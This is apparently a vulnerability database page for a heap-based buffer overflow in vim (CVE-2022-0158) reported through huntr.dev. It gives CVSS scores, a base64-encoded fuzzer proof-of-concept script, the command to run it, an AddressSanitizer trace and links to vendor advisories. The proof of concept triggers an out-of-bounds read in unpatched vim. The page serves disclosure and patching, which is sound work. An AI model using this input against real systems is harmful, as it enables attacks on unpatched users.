Lucene search
AidaipAC5D7005-07C6-4A0A-B251-BA9CDBF6738BHistoryJan 07, 2022 - 9:26 a.m.
Heap-based Buffer Overflow in vim/vim
2022-01-0709:26:40
aidaip
www.huntr.dev
6
3.3 Low
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
34.2%
Description
A Heap-based Buffer Overflow has been found in vim commit 2f0936c
Proof of Concept
base64 poc
ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
ZGVmY29tcGlsZQo=
~/fuzzing/vim/fuzz/bin/vim -u NONE -X -Z -e -s -S ./poc -c :qa!
ASan stack trace:
~/fuzzing/vim/fuzz/bin/vim -u NONE -X -Z -e -s -S ./poc -c :qa!
=================================================================
==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
READ of size 5 at 0x60200000622f thread T0
#0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
#1 0xc444a6 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
#2 0xf7515a (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
#3 0xe1ba91 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
#4 0xe14ca4 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
#5 0xe14009 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
#6 0xe12ddf (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
#7 0xe12043 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
#8 0xe0e863 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
#9 0xe0ffaa (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
#10 0xdaf709 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
#11 0xdc68ed (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
#12 0xd92167 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
#13 0x6e68fe (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
#14 0x6d9b41 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
#15 0xb6680a (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
#16 0xb6457f (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
#17 0x6e68fe (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
#18 0x6d9b41 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
#19 0xf60f43 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
#20 0xf5d76f (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
#21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#22 0x41dacd (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)
0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
allocated by thread T0 here:
#0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
#1 0x4c5d15 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
Shadow bytes around the buggy address:
0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
=>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==836524==ABORTING
Related
cnvd
cnvd
vim resource management error vulnerability (CNVD-2022-05043)
2022-01-14 00:00:00
cbl_mariner
cbl_mariner
CVE-2022-0158 affecting package vim 8.2.3582-1
2022-04-09 06:51:50
CVE-2022-0158 affecting package vim 8.2.4006-1
2022-01-26 22:53:46
veracode
veracode
Buffer Overflow
2022-01-23 17:15:36
prion
prion
Heap overflow
2022-01-10 16:15:00
alpinelinux
alpinelinux
CVE-2022-0158
2022-01-10 16:15:00
redhatcve
redhatcve
CVE-2022-0158
2022-01-12 23:22:43
osv
osv
CVE-2022-0158
2022-01-10 16:15:00
vim vulnerabilities
2023-07-03 00:47:59
debiancve
debiancve
CVE-2022-0158
2022-01-10 16:15:00
cve
cve
CVE-2022-0158
2022-01-10 16:15:00
ubuntucve
ubuntucve
CVE-2022-0158
2022-01-10 00:00:00
fedora
fedora
[SECURITY] Fedora 35 Update: vim-8.2.4068-1.fc35
2022-01-14 01:29:12
[SECURITY] Fedora 34 Update: vim-8.2.4068-1.fc34
2022-01-24 01:04:20
openvas
openvas
Fedora: Security Advisory for vim (FEDORA-2022-20e66c6698)
2022-01-14 00:00:00
Mageia: Security Advisory (MGASA-2022-0023)
2022-01-28 00:00:00
Ubuntu: Security Advisory (USN-6195-1)
2023-07-04 00:00:00
mageia
mageia
Updated vim packages fix security vulnerability
2022-01-18 22:29:46
ubuntu
ubuntu
Vim vulnerabilities
2023-07-03 00:00:00
nessus
nessus
Ubuntu 22.04 LTS : Vim vulnerabilities (USN-6195-1)
2023-07-03 00:00:00
Amazon Linux 2 : vim (ALAS-2022-1751)
2022-02-21 00:00:00
Amazon Linux AMI : vim (ALAS-2022-1567)
2022-02-19 00:00:00
cloudfoundry
cloudfoundry
USN-6195-1: Vim vulnerabilities | Cloud Foundry
2023-08-16 00:00:00
photon
photon
Important Photon OS Security Update - PHSA-2022-3.0-0380
2022-04-07 00:00:00
Important Photon OS Security Update - PHSA-2022-4.0-0161
2022-03-13 00:00:00
amazon
amazon
Medium: vim
2022-02-15 22:55:00
Medium: vim
2022-02-17 18:34:00
apple
apple
About the security content of macOS Big Sur 11.6.8
2022-07-20 00:00:00
About the security content of macOS Monterey 12.3
2022-03-14 00:00:00
gentoo
gentoo
Vim, gVim: Multiple Vulnerabilities
2022-08-21 00:00:00
3.3 Low
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
34.2%
Related for AC5D7005-07C6-4A0A-B251-BA9CDBF6738B